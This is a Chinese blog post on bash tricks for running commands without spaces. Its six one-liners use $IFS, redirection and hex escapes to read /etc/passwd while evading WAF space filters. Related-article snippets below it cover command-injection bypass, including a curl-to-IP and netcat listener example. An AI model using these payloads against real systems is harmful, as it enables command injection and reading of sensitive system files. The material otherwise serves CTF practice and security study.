bashtricks ：无空格命令执行

最新推荐文章于 2025-05-11 19:15:27 发布

原创最新推荐文章于 2025-05-11 19:15:27 发布 · 405 阅读

0 ·

CC 4.0 BY-SA版权

本文介绍了一系列在特定环境下，如存在WAF防护或无法使用空格字符时，用于读取系统文件的Shell命令技巧。这些命令适用于Ubuntu19.10和CentOS7等系统，但部分命令在macOS下可能因解析问题而失败。

在一些漏洞利用场景，或者因为waf等原因，导致无法使用空格时，可以试试如下命令：

IFS=,;`cat<<<cat,/etc/passwd` 
cat$IFS/etc/passwd 
cat${IFS}/etc/passwd 
cat</etc/passwd 
{cat,/etc/passwd} 
X=$'cat\x20/etc/passwd'&&$X

经过测试，除最后一条在mac osx下执行失败，这些命令在ubuntu 19.10和centos7下均执行成功。在mac osx系统下系统会将cat\x20/etc/passwd当成一个可执行文件，会提示No such file or directory。

来源：https://twitter.com/omespino/status/1241544334329208838

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

linux c语言中执行命令时，命令行包含的文件名中有空格的问题

数字人生

10-10

1043

比如，调用下面的函数来执行命令。如果命令语句cmd中，有文件名字符串filename，应该在filename两端加双引号。

【python】在Python代码中执行Linux命令的详细用法教程

景天科技苑

07-30

2245

在Python开发过程中，经常需要执行Linux系统命令来完成各种任务，如文件操作、系统状态检查等。Python提供了多种方式来调用和执行系统命令，其中`os`模块和`subprocess`模块是最常用的两种。本文将详细介绍如何在Python代码中执行Linux命令，并结合实际案例来演示这些方法的使用。

参与评论您还未登录，请先登录后发表或查看评论

命令执行的一些绕过技巧

m0_55754984的博客

09-14

4422

① 空格过滤空格可以用以下字符串代替： < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 $IFS在linux下表示分隔符，但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名，所以导致输不出来结果，然而如果加一个{}就固定了变量名，同理在后面加个$可以起到截断的作用，但是为什么要用$9呢，因为$9只是当前系统shell进程的第九个参数的持有者，它始终为空字符串。 ② 一些命令分隔符 linux中：%0a

linux下不用空格执行带参数的5种姿势

angaoux03775的博客

11-17

822

在搞安全的时候经常会遇到代码/命令执行，不能用空格的情况，总结了几种的绕过方法。 1.!! 1 [root@iZ28wg1kditZ tmp]# pwd 2 /tmp 3 [root@iZ28wg1kditZ tmp]# !! 4 pwd 5 /tmp 6 [root@iZ28wg1kditZ tmp]# 2.$IFS 1 [root@iZ28wg1kd...

linux命令绕过

qq_46229380的博客

12-18

1214

linux命令行绕过总结

【CTF】Linux Shell RCE绕过（bypass）技术总结

最新发布

vortex5的博客

05-11

1284

本文系统性地总结了在Linux环境下绕过远程代码执行（RCE）限制的多种技术。主要方法包括：1）空格绕过，利用$IFS、制表符、重定向符号等替代空格；2）命令执行函数绕过，使用passthru()、exec()等替代system()；3）命令连接符绕过，通过|、||、&等连接符拼接命令；4）严格过滤下的绕过，利用变量赋值、Base64编码、十六进制编码等技术绕过关键字过滤；5）通配符绕过，使用*、?等通配符模糊匹配路径；6）利用PATH变量绕过，通过截取和拼接$PATH中的字符构造命令；7）自增绕过

RCE：命令注入过滤空格远程代码执行 php://input 读取源代码

qq_69100706的博客

08-12

1138

命令注入是一种常见的技巧，用于实现远程代码执行（RCE）。命令注入发生在Web应用或服务接受用户输入并将其用于执行操作系统命令的场景中，如果用户输入未被妥善清理或验证，攻击者可以注入额外的命令，从而执行任意代码。

命令执行无回显的判断方法及DNSLOG相关例题的讲解

blue_fantasy的博客

01-10

2129

Text. 命令无回显的情况判断方法 1.延时 2.HTTP请求 3.DNS请求 <?php highlight_file(__FILE__); shell_exec($_GET[1]); ?> （1）通过传入1=ls|sleep(3) 页面加载3秒左右才显示来证明注入语句带入成功传入1=ls|curl 192.168.12.104:8000前先在本机开启nc -lvp 8000 （2）通过提前nc监听，利用curl命令进行信息获取（3）提前注册ceye.io平

CTF 命令执行绕过总结

jnszstmei的博客

06-01

1651

tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示。或：rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或：rce-xor.php & rce-xor.py。%09（url传递）(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@，$x,${x}绕过。7、异或无符号（过滤0-9a-zA-Z）more:一页一页的显示档案内容。

CTF 中 Bash中的小技巧

Assassin

08-22

3509

1.绕过空格过滤bash中可以过滤的符号$IFS$9 ${IFS} %09 （符号需要php环境）2.命令分隔符这里介绍5种姿势1.%0a符号换行符2.%0d符号回车符3.;符号在 shell 中，担任”连续指令”功能的符号就是”分号”4.&符号 & 放在启动参数后面表示设置此进程为后台进程，默认情况下，进程是前台进程，这时就把Shell给占据

命令注入绕过空格

weixin_39219503的博客

01-12

3158

01 全局变量 $ echo${IFS}1234 1234 $ echo$IFS$91234 1234 02 重定向符 $ cat<test 1234 $ cat<>test 1234 03 变量定义 $ cmd=$'\x201234'&&echo$cmd 1234 这个方式可以用ASCII编码，绕过所有字符限制。 04 字符串处理 $ a=$(id)&am...

DOS命令空格问题解决办法

youdaodao的博客

04-23

3498

1.用双引号"" 例如命令 csc D:\tool\vs2017\demo c#\Hello World.cs 改成 csc “D:\tool\vs2017\demo c#\Hello World.cs” 2.用缩写。比如c:\Program Files缩写为c:\Progra~1 采用8个字符缩写，即写头六个字母(略去空白），另加波浪号和1。例如： "Documents and Setting...

Linux基本知识

Alise_9920的博客

09-18

302

Linux就是一个操作系统。 Linux命令是由一个命令和多个参数构成，命令与参数之间以及参数与参数之间是可以用空格隔开的。同时也是区分大小写。

命令执行不能使用空格绕过

angaoux03775的博客

07-14

814

刚刚群里的朋友在问怎么绕过，另外一个基友发了这个办法，觉得遇到命令执行的漏洞会经常用到，记录下来：如果是linux的话，可以使用$IFS来进行绕过。不过国内相对资料比较少。 [root@iZ28wg1kditZ ~]# cat$IFS"/etc/passwd" root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbi...

Linux下绕过空格的方式总结

今天吃什么

01-25

1万+

cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt

常见命令执行的一些绕过方式

qq_53142368的博客

04-26

7506

文章目录一、命令执行二、绕过技巧1.常见管道符2. 空格过滤3. 黑名单绕过4. 绕过长度限制5. ls命令6. 各种读文件命令一、命令执行 1. php调用外部程序常用的函数： system()—执行shell命令也就是向dos发送一条指令。 shell_exec() — 通过 shell 环境执行命令，并且将完整的输出以字符串的方式返回。 exec() —执行外部程序。 passthru() — 执行外部程序并且显示原始输出。 2. 造成命令执行的原因代码过滤不严格–如使用system函数调用封装

bash中的空格